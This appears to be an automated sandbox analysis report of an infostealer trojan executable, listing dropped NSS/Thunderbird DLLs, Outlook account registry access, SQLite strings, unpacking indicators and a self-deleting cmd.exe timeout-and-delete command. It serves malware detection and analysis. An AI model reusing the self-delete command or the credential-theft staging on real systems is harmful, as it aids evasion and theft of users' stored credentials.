                      Source: Tk6dsSEyOC.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\Tk6dsSEyOC.exe "C:\Users\user\Desktop\Tk6dsSEyOC.exe"
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\user\Desktop\Tk6dsSEyOC.exe"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\user\Desktop\Tk6dsSEyOC.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK Jump to behavior
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\sqlite3.dllJump to behavior
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\Local\Temp\KVOjaLhCnJ.exeJump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/68@1/8
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_004279D5 CoCreateInstance,StrStrIW,CoTaskMemFree,CoTaskMemFree,0_2_004279D5
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile read: C:\Program Files (x86)\desktop.iniJump to behavior
                      Source: softokn3.dll.0.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                      Source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, sqlite3.dll.0.dr, nss3.dll.0.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                      Source: softokn3.dll.0.drBinary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
                      Source: softokn3.dll.0.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                      Source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, sqlite3.dll.0.dr, nss3.dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                      Source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, nss3.dll.0.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);<
                      Source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, sqlite3.dll.0.dr, nss3.dll.0.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                      Source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, sqlite3.dll.0.dr, nss3.dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                      Source: softokn3.dll.0.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                      Source: softokn3.dll.0.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                      Source: softokn3.dll.0.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                      Source: softokn3.dll.0.drBinary or memory string: SELECT ALL id FROM %s;
                      Source: softokn3.dll.0.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                      Source: sqlite3.dll.0.drBinary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                      Source: softokn3.dll.0.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                      Source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, nss3.dll.0.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                      Source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, nss3.dll.0.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                      Source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, sqlite3.dll.0.dr, nss3.dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                      Source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, nss3.dll.0.drBinary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
                      Source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, nss3.dll.0.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                      Source: softokn3.dll.0.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                      Source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, nss3.dll.0.drBinary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:
                      Source: sqlite3.dll.0.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4560:120:WilError_01
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeMutant created: \Sessions\1\BaseNamedObjects\useriZ5i-O1fR-8gT0
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCommand line argument: NaF0_2_004660A0
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account ManagerJump to behavior
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                      Source: Tk6dsSEyOC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: Tk6dsSEyOC.exe, 00000000.00000003.374795304.000000004BC6B000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.427942523.000000004BC71000.00000004.00000010.sdmp, freebl3.dll.0.dr
                      Source: Binary string: C:\bixorotuma_wufeyeyur\loyopuwudi-xovozoko\muba.pdb source: Tk6dsSEyOC.exe
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.0.dr
                      Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, nss3.dll.0.dr
                      Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.0.dr
                      Source: Binary string: ucrtbase.pdb source: ucrtbase.dll.0.dr
                      Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: Tk6dsSEyOC.exe, 00000000.00000003.427951428.000000004BC7E000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000002.481321705.000000004BC7E000.00000004.00000010.sdmp, api-ms-win-core-memory-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: Tk6dsSEyOC.exe, 00000000.00000003.378196371.000000004BC7F000.00000004.00000010.sdmp, ldap60.dll.0.dr
                      Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.0.dr
                      Source: Binary string: C:\bixorotuma_wufeyeyur\loyopuwudi-xovozoko\muba.pdb0= source: Tk6dsSEyOC.exe
                      Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.0.dr
                      Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr
                      Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: Tk6dsSEyOC.exe, 00000000.00000002.483423544.000000006FD89000.00000002.00020000.sdmp, mozglue.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: Tk6dsSEyOC.exe, 00000000.00000003.374795304.000000004BC6B000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.427942523.000000004BC71000.00000004.00000010.sdmp, freebl3.dll.0.dr
                      Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.0.dr
                      Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy.dll.0.dr, MapiProxy_InUse.dll.0.dr
                      Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.0.dr
                      Source: Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: Tk6dsSEyOC.exe, 00000000.00000003.378196371.000000004BC7F000.00000004.00000010.sdmp, ldap60.dll.0.dr
                      Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb66 source: nssckbi.dll.0.dr
                      Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.0.dr
                      Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb<< source: IA2Marshal.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: Tk6dsSEyOC.exe, 00000000.00000002.483423544.000000006FD89000.00000002.00020000.sdmp, mozglue.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\library\dummydll\qipcap.pdb source: qipcap.dll.0.dr
                      Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.0.dr
                      Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.0.dr
                      Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.0.dr
                      Source: Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
                      Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapiDLL\mozMapi32.pdb source: mozMapi32.dll.0.dr, mozMapi32_InUse.dll.0.dr
                      Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.0.dr
                      Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.0.dr
                      Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\msaa\AccessibleMarshal.pdb source: Tk6dsSEyOC.exe, 00000000.00000003.372483857.000000004BC51000.00000004.00000010.sdmp, AccessibleMarshal.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.0.dr
                      Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: Tk6dsSEyOC.exe, 00000000.00000003.373618716.000000004BC7F000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.373284353.000000004BC7E000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.373416548.000000004BC7E000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.373403037.000000004BC7E000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.373313194.000000004BC7E000.00000004.00000010.sdmp, breakpadinjector.dll.0.dr
                      Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.0.dr

                      Data Obfuscation:

                      barindex
                      Detected unpacking (overwrites its own PE header)Show sources
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeUnpacked PE file: 0.2.Tk6dsSEyOC.exe.400000.0.unpack
                      Detected unpacking (changes PE section rights)Show sources
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeUnpacked PE file: 0.2.Tk6dsSEyOC.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_00466770 push eax; ret 0_2_0046678E
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_004667E0 push eax; ret 0_2_004667C5
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_0046678F push eax; ret 0_2_004667C5
                      Source: sqlite3.dll.0.drStatic PE information: section name: /4
                      Source: sqlite3.dll.0.drStatic PE information: section name: /19
                      Source: sqlite3.dll.0.drStatic PE information: section name: /31
                      Source: sqlite3.dll.0.drStatic PE information: section name: /45
                      Source: sqlite3.dll.0.drStatic PE information: section name: /57
                      Source: sqlite3.dll.0.drStatic PE information: section name: /70
                      Source: sqlite3.dll.0.drStatic PE information: section name: /81
                      Source: sqlite3.dll.0.drStatic PE information: section name: /92
                      Source: AccessibleHandler.dll.0.drStatic PE information: section name: .orpc
                      Source: AccessibleMarshal.dll.0.drStatic PE information: section name: .orpc
                      Source: IA2Marshal.dll.0.drStatic PE information: section name: .orpc
                      Source: lgpllibs.dll.0.drStatic PE information: section name: .rodata
                      Source: MapiProxy.dll.0.drStatic PE information: section name: .orpc
                      Source: MapiProxy_InUse.dll.0.drStatic PE information: section name: .orpc
                      Source: mozglue.dll.0.drStatic PE information: section name: .didat
                      Source: msvcp140.dll.0.drStatic PE information: section name: .didat
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_004333DD LoadLibraryA,GetProcAddress,FreeLibrary,0_2_004333DD
                      Source: api-ms-win-crt-multibyte-l1-1-0.dll.0.drStatic PE information: 0x9F27750A [Wed Aug 12 16:00:10 2054 UTC]
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.95634126707
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\lgpllibs.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\MapiProxy_InUse.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\qipcap.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\sqlite3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\AccessibleHandler.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\softokn3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\freebl3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\nssdbm3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\libEGL.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\ucrtbase.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\mozMapi32_InUse.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\prldap60.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\nss3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\ldif60.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\mozglue.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\vcruntime140.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\mozMapi32.dllJump to dropped file
